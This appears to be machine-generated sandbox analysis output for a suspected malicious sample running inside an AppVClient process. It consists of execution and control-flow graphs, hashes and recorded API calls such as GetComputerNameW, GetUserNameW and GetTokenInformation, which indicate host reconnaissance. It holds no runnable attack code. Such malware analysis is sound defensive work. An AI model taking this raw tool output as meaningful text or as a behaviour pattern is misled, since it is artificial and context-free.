                                                                                                                                                                                                                          execution_graph 5739 b88090 5744 b88075 5739->5744 5740 b88186 CloseHandle 5740->5744 5741 b880ca GetTokenInformation 5741->5744 5742 b880a7 5743 b881ad GetTokenInformation 5743->5744 5744->5740 5744->5741 5744->5742 5744->5743 5760 b857f0 5763 b855ac 5760->5763 5761 b855e9 5763->5760 5763->5761 5764 ba3870 5763->5764 5765 ba3876 5764->5765 5767 ba3893 5765->5767 5768 ba3720 5765->5768 5767->5763 5770 b90c42 5768->5770 5769 ba37dd 5769->5767 5770->5768 5770->5769 5771 b8e050 VirtualAlloc 5770->5771 5771->5770 5704 b881b1 5708 b88075 5704->5708 5705 b88186 CloseHandle 5705->5708 5706 b880ca GetTokenInformation 5706->5708 5707 b881ad GetTokenInformation 5707->5708 5708->5705 5708->5706 5708->5707 5709 b880a7 5708->5709 5745 b852f4 5748 b852cb 5745->5748 5746 b853c4 GetSystemDefaultLangID 5747 b852b0 5746->5747 5748->5746 5748->5747 5734 b852b7 5735 b852b0 5734->5735 5736 b852c4 5734->5736 5736->5735 5737 b853c4 GetSystemDefaultLangID 5736->5737 5738 b85475 5737->5738 5786 b85b09 5787 b85b16 5786->5787 5788 b85cdf CreateThread 5787->5788 5789 b85c01 5787->5789 5788->5787 5788->5789 5790 b854a0 5788->5790 5789->5789 5772 b855ef 5775 b855ac 5772->5775 5773 ba3870 VirtualAlloc 5773->5775 5774 b855e9 5775->5773 5775->5774 5674 b85b00 5675 b85bba 5674->5675 5682 b952c0 5675->5682 5677 b85bc7 5681 b85bde 5677->5681 5687 ba0080 5677->5687 5683 b952c6 5682->5683 5686 b952ce 5682->5686 5683->5686 5701 b8e050 5683->5701 5686->5677 5693 ba0089 5687->5693 5688 ba03e0 GetComputerNameW 5688->5693 5689 ba0181 VirtualFree 5689->5693 5690 b8e050 VirtualAlloc 5690->5693 5691 ba03bf GetUserNameW 5691->5693 5692 ba04d6 GetComputerNameW 5692->5693 5693->5688 5693->5689 5693->5690 5693->5691 5693->5692 5694 b85c7b 5693->5694 5695 b88070 5694->5695 5699 b88075 5695->5699 5696 b88186 CloseHandle 5696->5699 5697 b881ad GetTokenInformation 5697->5699 5698 b880ca GetTokenInformation 5698->5699 5699->5696 5699->5697 5699->5698 5700 b880a7 5699->5700 5700->5681 5702 b8e0c3 5701->5702 5703 b8e0d8 VirtualAlloc 5702->5703 5703->5702 5749 b85860 5750 b952c0 VirtualAlloc 5749->5750 5751 b85869 5750->5751 5752 ba0080 5 API calls 5751->5752 5753 b8587d 5752->5753 5754 b88070 3 API calls 5753->5754 5755 b85870 5754->5755 5710 b85b42 5711 b85b07 5710->5711 5711->5710 5714 b85bb4 5711->5714 5715 b85b68 5711->5715 5716 b852a0 5711->5716 5713 b85cdf CreateThread 5713->5714 5713->5715 5720 b854a0 5713->5720 5714->5713 5714->5715 5719 b852ab 5716->5719 5717 b853c4 GetSystemDefaultLangID 5718 b852b0 5717->5718 5718->5711 5719->5717 5719->5718 5721 b854b5 5720->5721 5776 b855e4 5778 b855ac 5776->5778 5777 b855e9 5778->5776 5778->5777 5779 ba3870 VirtualAlloc 5778->5779 5779->5778 5727 b85b87 CreateThread 5729 b85b1c 5727->5729 5731 b85810 5727->5731 5728 b85cdf CreateThread 5728->5729 5730 b85c01 5728->5730 5733 b854a0 5728->5733 5729->5728 5729->5730 5732 b85822 5731->5732 5811 b85347 5815 b852cb 5811->5815 5812 b852b0 5813 b853c4 GetSystemDefaultLangID 5814 b85475 5813->5814 5815->5812 5815->5813

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00B852A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 282 b852a0-b853fe 287 bc0d4c-bc0d4e 282->287 288 b85400-b85424 282->288 290 b8542a 288->290 291 b8539b 288->291 290->291 292 b85430-b8543e 290->292 293 b8539d-b853a1 291->293 294 b85413-b85419 291->294 295 b85441-b8544a 292->295 296 b852b0-b852b5 293->296 297 b853a7 293->297 302 b85450 295->302 303 b853c4-b853ca GetSystemDefaultLangID 295->303 297->296 298 b853ad 297->298 300 b853af 298->300 301 b853f3-b853f9 298->301 304 b853e0-b853f1 300->304 312 b8532a 301->312 313 b85355 301->313 310 b85411 302->310 311 b853c1 302->311 306 b85475-b8547b 303->306 304->294 304->301 306->287 310->294 310->303 311->310 314 b853c3 311->314 312->313 316 b8532c-b8533f 312->316 318 b852e8-b85363 313->318 319 b852d1-b852e7 313->319 317 b8536b-b8536f 316->317 317->295 320 b85375-b85390 317->320 324 b853d1-b853d5 318->324 325 b85365 318->325 319->318 320->314 326 b85392-b8539a 320->326 324->293 327 b853d7 324->327 325->324 328 b85367-b85369 325->328 326->293 327->304 329 b85342-b85345 327->329 328->317 329->288 330 b8534b 329->330 330->288 331 b85351-b85353 330->331 331->313
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDefaultLangID.KERNELBASE ref: 00B853C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DefaultLangSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 706401283-0
                                                                                                                                                                                                                          • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                          • Instruction ID: bfbcfa76e8cd4bbe5457652ae9c580235a8a8ce69690a9e437a6f1ca008cc0cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D74106A240DE958FD736762448A43B07BE0EB123E2F9D00E7D4C38B1F6E5984C81D72A
                                                                                                                                                                                                                          Function 00BA0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 ba0080-ba0286 2 ba0099-ba0575 0->2 3 ba028c 0->3 7 ba057b 2->7 8 ba0155 2->8 5 ba0445 3->5 5->2 6 ba044b-ba0457 5->6 9 ba0458-ba0472 GetComputerNameW 6->9 7->8 10 ba0581-ba0587 7->10 11 ba02ef-ba0495 call b8e050 * 2 8->11 15 ba03ee-ba03f4 9->15 16 ba024c-ba0253 9->16 13 ba058b 10->13 11->9 55 ba043e 11->55 18 ba058c-ba0591 13->18 19 ba0181 VirtualFree 13->19 37 ba00da-ba023f 15->37 38 ba03fa 15->38 23 ba01e6 16->23 24 ba0255 16->24 21 ba04ab-ba04af 18->21 22 ba0597 18->22 20 ba01a8-ba02ac call bb7164 19->20 28 ba02b1-ba02be 20->28 48 ba04c7 21->48 22->21 30 ba059d 22->30 27 ba01ec-ba0313 call bb715c 23->27 23->28 31 ba02d3 24->31 52 ba0318-ba031e 27->52 33 ba03bf-ba03d9 GetUserNameW 28->33 34 ba02c4 28->34 30->21 31->23 36 ba02d9 31->36 43 ba0331 33->43 34->33 44 ba02ca 34->44 36->11 37->16 50 ba0241-ba024a 37->50 38->37 45 ba0400 38->45 53 ba0171 43->53 54 ba0337 43->54 44->31 51 bab1ee-bab49f 45->51 58 ba04cc-ba04e6 call bb9970 GetComputerNameW 48->58 50->16 50->28 56 ba0568-ba056b 52->56 57 ba0324 52->57 59 ba013f-ba0146 53->59 60 ba0173 53->60 54->53 61 ba033d 54->61 55->5 56->58 57->56 64 ba032a 57->64 70 ba04ec-ba0514 58->70 71 ba0131 58->71 59->13 66 ba0230 60->66 62 ba05d0-ba05d9 61->62 62->51 64->43 66->48 67 ba0236-ba05c2 66->67 67->48 74 ba05c8-ba05c9 67->74 70->56 72 ba0089-ba008c 71->72 73 ba0137 71->73 72->20 76 ba0092 72->76 73->72 77 ba013d 73->77 74->62 76->20 78 ba0098 76->78 77->19 77->59 78->2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ComputerName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3545744682-0
                                                                                                                                                                                                                          • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                          • Instruction ID: 208b6515a2ace54b791424190b98d35bc04cf792c69bee95e999594717fa5d46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4D1263142CB0D8BCB28FF58C8857EAB7E1FBA6310F58469EE446C3164DA74DA4586C2
                                                                                                                                                                                                                          Function 00B88070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 79 b88070-b8817e 81 b8813d-b881a5 79->81 82 b88180 79->82 97 b881bd-b881ca 81->97 98 b881a7 81->98 83 b8815f 82->83 84 b88184 82->84 83->81 86 b88161 83->86 87 b8818c-b88192 84->87 88 b88186 CloseHandle 84->88 90 b88163-b88170 call bb7164 86->90 91 b88194 87->91 92 b88115-b88118 87->92 88->87 90->88 103 b88172 90->103 91->92 94 b8819a 91->94 95 b88119-b8811a 92->95 96 b880a7 92->96 100 b8813c 94->100 95->96 101 b8811c 95->101 107 b881d0 97->107 108 b880f3 97->108 100->84 104 b8820f 101->104 103->87 105 b8808e-b88096 104->105 106 b88215-b8821e 104->106 105->84 105->96 106->105 116 b88224 106->116 117 b881fe-b88201 GetTokenInformation 107->117 118 b880c3 107->118 109 b8808c 108->109 110 b880f5 108->110 109->105 110->109 115 b88077 110->115 119 b881d7-b881de call bb715c 115->119 116->119 120 b88226 116->120 117->104 127 b881b7 117->127 118->117 122 b880c9 118->122 129 b881e3-b881e6 119->129 120->119 123 b88228-b882ee call b85d90 120->123 126 b880ca-b880d8 GetTokenInformation 122->126 146 b8830c-b8831e 123->146 147 b882f0 123->147 130 b8810f 126->130 127->104 132 b881b9-b881bb 127->132 129->126 142 b88089 129->142 133 b8812d 130->133 134 b88111 130->134 132->97 139 b880a8 133->139 140 b88133 133->140 134->133 137 b88113 134->137 137->92 144 b880aa-b880ad 139->144 140->100 141 b881ed-b881f0 140->141 148 b880da-b880f1 141->148 149 b881f6 141->149 142->126 145 b8808b 142->145 144->90 150 b880b3-b88203 144->150 145->109 151 b88320 146->151 152 b882a1-b882ba call b85d90 call b8ec00 146->152 147->146 153 b882f2 147->153 148->144 149->148 154 b881fc 149->154 150->90 160 b88209 150->160 158 b88322 151->158 159 b882f7-b882fc call b85d90 151->159 152->151 153->159 154->117 158->159 162 b88324-b88326 158->162 170 b88302 159->170 171 b88253-b88265 call ba1280 159->171 166 b88328 162->166 172 b882df-b8832b 166->172 173 b88335 166->173 170->171 175 b88308-b8830a 170->175 171->166 180 b8826b 171->180 172->173 179 b8832d-b88331 172->179 178 b8826e-b88285 173->178 175->146 181 b8829b-b8829d 178->181 182 b88287 178->182 179->173 180->178 184 b88239 180->184 181->152 183 b8824c 182->183 183->181 186 b8824e-b88252 183->186 184->166 185 b8823f-b88243 184->185 185->159 185->183 186->178
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                          • Instruction ID: 9b64a698bc1afda0ce909035c23014b861c11e819293cc7255fc46a409a50714
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6061333060CA469FC7A5BF2898987367BE0FB59350FE802DAE446D31B1DF249C45D392
                                                                                                                                                                                                                          Function 00B8599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 439 b8599b-b8599e 440 b859f7 439->440 441 b85a02 440->441 443 b8597d 441->443 444 b859d4 441->444 443->444 445 b8597f-b85981 443->445 446 b859d8-b859de 444->446 447 b8593b-b85a15 call ba11a0 444->447 448 b85983-b85a38 445->448 453 b859e0 446->453 454 b85994-b8599c 446->454 448->454 455 b85a3e 448->455 453->454 457 b859e2-b859ec 453->457 454->441 458 b8599e 454->458 459 b85a2c-b85a34 455->459 460 b859ee-b859ef 457->460 461 b85a62-b85a6e 457->461 458->440 462 b859d9-b859de call bb2190 459->462 460->448 465 b859f1 call bb9970 460->465 463 b85a70 461->463 464 b85a75-b85ab3 call ba1280 461->464 462->453 462->454 463->464 468 b85a72 463->468 477 b85abb-b85af2 464->477 478 b85ab5 464->478 476 b859b8 call ba0df0 465->476 468->464 481 b859bd-b859c2 call b85d90 476->481 485 b85af3 477->485 478->477 480 b85ab7-b85ab9 478->480 480->477 484 b859c7-b859ce 481->484 486 b85a1a-b85a26 484->486 487 b859d0 484->487 485->485 486->459 489 b859a1-b859b5 call b85e10 486->489 487->486 488 b859d2 487->488 488->462 489->476 492 b85a08-b85a0b 489->492 492->454 493 b85a0d 492->493 495 b85991 493->495 496 b85932 493->496 495->496 497 b85993 495->497 497->454
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                          • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                          • Instruction ID: c4a8d9904ae8342a1423063b10073a91ee0fb095379de8fced6a8bee046ecf7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901D67451DE84CFD67BBB1844C52B966D2F758320F2845D6D08AC70B2C9344D00D742
                                                                                                                                                                                                                          Function 00B88090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 498 b88090-b88096 499 b88184 498->499 500 b8818c-b88192 499->500 501 b88186 CloseHandle 499->501 502 b88194 500->502 503 b88115-b88118 500->503 501->500 502->503 504 b8819a 502->504 505 b88119-b8811a 503->505 506 b880a7 503->506 507 b8813c 504->507 505->506 508 b8811c 505->508 507->499 509 b8820f 508->509 510 b8808e-b88096 509->510 511 b88215-b8821e 509->511 510->499 510->506 511->510 513 b88224 511->513 514 b88226 513->514 515 b881d7-b881e6 call bb715c 513->515 514->515 516 b88228-b882ee call b85d90 514->516 524 b88089 515->524 525 b880ca-b8810f GetTokenInformation 515->525 528 b8830c-b8831e 516->528 529 b882f0 516->529 524->525 527 b8808b 524->527 533 b8812d 525->533 534 b88111 525->534 537 b8808c 527->537 531 b88320 528->531 532 b882a1-b882ba call b85d90 call b8ec00 528->532 529->528 535 b882f2 529->535 538 b88322 531->538 539 b882f7-b882fc call b85d90 531->539 532->531 541 b880a8 533->541 542 b88133 533->542 534->533 540 b88113 534->540 535->539 537->510 538->539 546 b88324-b88326 538->546 560 b88302 539->560 561 b88253-b88265 call ba1280 539->561 540->503 545 b880aa-b880ad 541->545 542->507 543 b881ed-b881f0 542->543 549 b880da-b880f1 543->549 550 b881f6 543->550 551 b88163-b88170 call bb7164 545->551 552 b880b3-b88203 545->552 553 b88328 546->553 549->545 550->549 557 b881fc 550->557 551->501 570 b88172 551->570 552->551 569 b88209 552->569 564 b882df-b8832b 553->564 565 b88335 553->565 567 b881fe-b88201 GetTokenInformation 557->567 560->561 568 b88308-b8830a 560->568 561->553 577 b8826b 561->577 564->565 576 b8832d-b88331 564->576 574 b8826e-b88285 565->574 567->509 581 b881b7 567->581 568->528 570->500 579 b8829b-b8829d 574->579 580 b88287 574->580 576->565 577->574 583 b88239 577->583 579->532 582 b8824c 580->582 581->509 584 b881b9-b881ca 581->584 582->579 586 b8824e-b88252 582->586 583->553 585 b8823f-b88243 583->585 589 b881d0 584->589 590 b880f3 584->590 585->539 585->582 586->574 589->567 596 b880c3 589->596 590->537 591 b880f5 590->591 591->537 595 b88077 591->595 595->515 596->567 597 b880c9 596->597 597->525
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000011.00000002.1642667055.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_b80000_AppVClient.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                          • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                          • Instruction ID: a972257ab814c39894ddf35c994b17c9b0e67f4e9668196cfe58b32487f78c4c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4C08C7412C802A7527A36482C4F0B52AD0C60E350BCC00C68C02A0230DD288E03C397